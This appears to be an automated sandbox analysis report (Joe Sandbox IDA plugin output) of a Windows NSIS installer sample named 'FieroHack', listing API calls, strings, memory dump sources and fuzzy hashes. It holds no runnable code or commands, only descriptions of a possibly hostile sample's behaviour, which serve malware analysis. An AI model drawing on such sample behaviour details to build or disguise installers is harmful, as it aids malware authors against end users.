                                                    • API String ID: 2531174081-0
                                                    • Opcode ID: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                    • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                    • Opcode Fuzzy Hash: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                    • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                    APIs
                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                    • GetMessagePos.USER32 ref: 00404AF1
                                                    • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$ClientScreen
                                                    • String ID: f
                                                    • API String ID: 41195575-1993550816
                                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                    • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                    • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                    APIs
                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402E00
                                                    • wsprintfA.USER32 ref: 00402E10
                                                    • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                    Strings
                                                    • verifying installer: %d%%, xrefs: 00402E0A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                    • String ID: verifying installer: %d%%
                                                    • API String ID: 1451636040-82062127
                                                    • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                    • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                    • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                    • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                    • GetLastError.KERNEL32 ref: 0040573B
                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                    • GetLastError.KERNEL32 ref: 0040575A
                                                    Strings
                                                    • C:\Users\user\Desktop, xrefs: 004056E4
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                    • API String ID: 3449924974-2028306314
                                                    • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                    • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                    • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                    • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                    • GlobalFree.KERNEL32(?), ref: 0040288E
                                                    • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                    • String ID:
                                                    • API String ID: 2667972263-0
                                                    • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                    • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                    • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                    • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                    APIs
                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CloseEnum$DeleteValue
                                                    • String ID:
                                                    • API String ID: 1354259210-0
                                                    • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                    • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                    • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                    • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                    APIs
                                                    • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                    • GetClientRect.USER32(?,?), ref: 00401DCC
                                                    • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                    • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                    • DeleteObject.GDI32(00000000), ref: 00401E20
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                    • String ID:
                                                    • API String ID: 1849352358-0
                                                    • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                    • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                    • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                    • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                    APIs
                                                    • GetDC.USER32(?), ref: 00401E38
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                    • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                    • String ID:
                                                    • API String ID: 3808545654-0
                                                    • Opcode ID: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
                                                    • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                    • Opcode Fuzzy Hash: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
                                                    • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                    APIs
                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout
                                                    • String ID: !
                                                    • API String ID: 1777923405-2657877971
                                                    • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                    • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                    • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                    • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                    APIs
                                                    • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                    • wsprintfA.USER32 ref: 00404A6A
                                                    • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: ItemTextlstrlenwsprintf
                                                    • String ID: %u.%u%s%s
                                                    • API String ID: 3540041739-3551169577
                                                    • Opcode ID: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
                                                    • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                    • Opcode Fuzzy Hash: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
                                                    • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                    APIs
                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrcatlstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 2659869361-3081826266
                                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                    • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                    • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 2987980305-0
                                                    • Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                    • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                    • Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                    • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                    APIs
                                                    • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                    • GetTickCount.KERNEL32 ref: 00402E6E
                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                    • String ID:
                                                    • API String ID: 2102729457-0
                                                    • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                    • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                    • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                    • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                    APIs
                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                    • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                    • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 3248276644-3081826266
                                                    • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                    • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                    • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                    • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 004051C1
                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                      • Part of subcall function 004041C7: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 004041D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Window$CallMessageProcSendVisible
                                                    • String ID:
                                                    • API String ID: 3748168415-3916222277
                                                    • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                    • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                    • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                    • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                    • GlobalFree.KERNEL32(?), ref: 00403896
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
